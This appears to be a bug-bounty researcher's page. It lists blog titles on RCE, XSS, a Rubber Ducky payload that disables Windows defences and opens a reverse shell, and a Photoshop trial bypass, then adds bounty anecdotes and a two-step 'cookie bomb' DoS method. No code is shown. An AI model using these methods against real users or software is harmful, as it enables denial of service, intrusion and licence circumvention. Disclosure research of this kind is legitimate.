Bugcrowd’s Status – Feb 05th, 2020 Currently rank #65 (from Feb 05th, 2020) at Bugcrowd Bug Bounty Platform with: P1 Warrior (start from 2019): 5th Tier...
- From Recon to Optimizing RCE Results – Simple Story with One of the Biggest ICT Company in the World
- If Allah willed it, will be back soon!
- 5,000 USD XSS Issue at Avast Desktop AntiVirus for Windows (Yes, Desktop!)
- CVE-2019–18624 – Illegal Rendered at Download Feature in Several Apps (including Opera Mini) that Lead to Extension Manipulation (with RTLO)
- Race Condition that could Result to RCE – (A story with an App that temporary stored an uploaded file within 2 seconds before moving it to Amazon S3)
- USB HID – Rubber Duck Payload – Auto Turn Off UAC, Firewall, & Defender at Windows 10 & Connect to Reverse Shell in 10 sec
- Adobe Photoshop CC 2019 v. 20.0.0 (for OS X) Expired Subscription Bypass – Bypass Trial Expired
Cookie Bomb - User DoS (P2)🍪💣
1. Find a cookie that's based on a parameter value such as a link click tracker.
2. Build a PoC that sets large cookies until the server refuses all requests.
If url encoded, use a bunch of commas.
I received a $500 reward from Facebook for DoS I found in Instagram direct messages. Below is a scenario that shows impact on group messages.
Good slides: https://docs.google.com/presentation/d/1N9Ygrpg0Z-1GFDhLMiG3jJV6B_yGqBk8tuRWO1ZicV8/edit#slide=id.g82807e23a8_0_8
The last trick (Authy 2FA bypass) is covered in "Idor to Shell" from @PentesterLab
My first bounty + first CVE-2013-6674 was from Mozilla back in 2014-01-29. The vulnerability was Stored XSS and affected Mozilla Thunderbird email client (desktop) version. Affected millions of users at that time.
More details + POC Video:
Incredible research: $75,000 bounty🤯
"My research uncovered 7 0day vulnerabilities in Safari (CVE-2020-3852, CVE-2020-3864, CVE-2020-3865, CVE-2020-3885, CVE-2020-3887, CVE-2020-9784, & CVE-2020-9787), 3 were used in kill chain to access the camera."